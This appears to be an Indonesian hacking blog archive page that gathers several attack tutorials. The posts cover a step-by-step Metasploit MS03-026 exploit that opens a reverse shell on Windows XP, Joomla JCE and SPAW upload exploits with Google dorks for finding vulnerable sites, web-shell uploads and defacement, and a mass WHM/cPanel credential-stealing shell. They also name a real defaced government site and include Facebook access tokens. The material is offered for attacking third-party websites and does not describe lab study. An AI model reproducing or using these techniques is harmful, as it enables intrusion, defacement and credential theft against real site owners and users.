Tampilkan postingan dengan label defence. Tampilkan semua postingan
Tampilkan postingan dengan label defence. Tampilkan semua postingan

Selasa, 05 November 2013

Exploit and Gain Remote Access to Windows XP (Metasploit)


Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.
  • Exploit
Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.
  • Payload
A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.
  • Shellcode
This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.
  • Module
A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.
  • Listener
This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.
  • Show
Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.
Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1: Getting Started

First, open a terminal in Linux.
One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.
msfconsole
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2: Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:
msf > search dcom




Step 3: Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.
msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4: Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.
msf > show options


Step 5: Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.
msf > set RHOST 10.0.0.3
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads


Step 7: Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.
msf > set PAYLOAD generic/shell_reverse_tcp


Step 8: Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
msf > set LHOST 10.0.0.6


Step 9: Exploit

Now we command Metasploit to exploit the system:
msf > exploit

Step 10: Open a Shell on the Hacked System

Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.
sessions –i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
C: >dir
Congratulations! You have just hacked your first system using Metasploit!

Rabu, 16 Oktober 2013

Exploit Lama Joomla JCE Ext

Setelah lama saya tidak posting deface, kali ini saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.

Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php
JCE Exploiter Versi .exe
  1. Download JCE Exploiternya disini
  2. Selesai download, anda cari target yang vuln menggunakan dork :
    inurl:index.php?option=com_jce
  3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com
  4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe


    5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini


    6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda


7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

JCE Exploiter Versi .php

1. Download scriptnya disini

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini


4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja

6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini


7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

SUMBER : http://ramadhanlmzero.blogspot.com/2013/07/cara-deface-web-dengan-exploit-jce.html

Selasa, 15 Oktober 2013

Download Mannu Auto Mass WHM exploiter

"Mannu, auto massa WHM exploiter" php hacking shell siap dan tersedia untuk di-download umum.

Dengan menggunakan Script ini, Anda bisa mendapatkan semua WHM & cPanel server dengan satu klik. Anda tidak perlu untuk tersambung ke mendapatkan MYSQL Database untuk mendapatkan password.

Fuctions Khusus dari Shell ini
  1. Fasilitas Auto symlink ke file konfigurasi symlink whmcs dan kemudian memanfaatkan whmcs symlinked semua untuk ambil whm info dari database dengan sendirinya
  2. Anda dapat memilih baik untuk menampilkan whm info, info besar cpanels atau keduanya dengan cek yang menandai
  3. symlinker mode aman yang akan symlink whmcs file konfigurasi jika mode aman

Rabu, 03 Oktober 2012

Xpad Multi Editor Plus Aka Notepad



Author By : Me Shandy Afrian & Yogi Nax's Czr

Features :
[=]Syntax Highlighting and Syntax Folding
[=]User Defined Syntax Highlighting and Folding
[=]PCRE (Perl Compatible Regular Expression) Search/Replace
[=]GUI entirely customizable: minimalist, tab with close button, multi-line tab, vertical [=]tab and vertical document list
[=]Document Map
[=]Auto-completion: Word completion, Function completion and Function parameters hint
[=]Multi-Document (Tab interface)
[=]Multi-View
[=]WYSIWYG (Printing)
[=]Zoom in and zoom out
[=]Multi-Language environment supported
[=]Bookmark
[=]Macro recording and playback
[=]Launch with different arguments

Download Link :
http://www.mediafire.com/?qyaos7kwp2t9t57
Password : 123456
Mirror Link : http://www.4shared.com/rar/ZBNape8J/XPadME_Plus_V01.html?

Sabtu, 28 Juli 2012

Cara Deface Website Melalui Spaw Uploads Vulnerability

Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

3). Ganti pada Bagian 
/spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

4).
Tekan Enter, Nanti akan Terbuka Seperti Ini :

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.


http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

6). 
Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

7). Selanjutnya Klik Tombol Upload.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

9). Selesai, dan Hasilnya :

http://www.dtam.moph.go.th/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

Source : Hacker Newbie

Jumat, 13 Juli 2012

Cara Memperbaiki Group FB / Menghapus Komentar Script Maho'


Musim banget belakangan ini para bocah ngerjain group2 tempat belajar. hadeeeh -_- buat apa sih yg begituan diganggu? padahal apa yang dilakuin tersebut bersifat mengganggu para member. hehe
Kalau mau merusuh sih boleh boleh saja, tapi lihat posisinya dong. Niat baik Anda pasti dihargai :)

Cara memperbaiki Grup FB / menghapus Komentar Script Maho' bisa diatasi kok. Pertama sekali, kita harus mencari dimana coment yang mengganggu di simpan
caranya :
1. Kiriman Group
https://graph.facebook.com/id_grup/feed?access_token=token aplikasi
contoh :
https://graph.facebook.com/260272420675092/feed?access_token=202449083143672|5nmhVxHvEPoAWoQqkSv7cR47W2M

2. Dokumen Group
https://graph.facebook.com/260272420675092/docs?access_token=202449083143672|5nmhVxHvEPoAWoQqkSv7cR47W2M

3. Status / Feeds
https://graph.facebook.com/me/feed?access_token=akses token

4. Notes / Catatan
https://graph.facebook.com/me/notes?access_token=akses token

5. Photo FB
https://graph.facebook.com/me/photos?access_token=akses token

6. Album Photo
https://graph.facebook.com/me/albums?access_token=akses token

waktunya mencari comment yang bermasalah.(untuk memudahkan pencarian, pakai find / ctrl+f. di cari kata "note")
Apabila sudah kita temukan id commentnya (ex:116865790419_10151100233445420_10151100282365420)

Waktunya kita hapus comment itu dengan cara :
Rumus:
https://graph.facebook.com/id_commen?method=delete&access_token=token

contoh :
https://graph.facebook.com/116865790419_10151100233445420_10151100282365420?method=delete&access_token=
AAAC4IFmvlfgBAPIZAbZB21QMYEN1ZBgGjS9Xuf6Fl79BYxNPBwL4s7JKvb4FlcaIyZANwXAZCQwkg5x8Es3j8lhtIErxuxKZCPxVUp7sopXLH4pqOj

Token diatas hanya contoh, untuk Akses token bisa didapat disini => https://developers.facebook.com/tools/access_token/
Apabila hasilnya TRUE maka berhasil

Oh iya, ini yang bisa menghapus hanya admin group. karena Admin yang punya kuasa untuk menghapus suatu komentar

Selamat Mencoba
Thank's to Om Doza Cracker

Source:  http://www.facebook.com/groups/cyber.xplorer/doc/457721050918809/
Diberdayakan oleh Blogger.

 

© 2013 I'Learning. All rights resevered. Designed by Templateism

Back To Top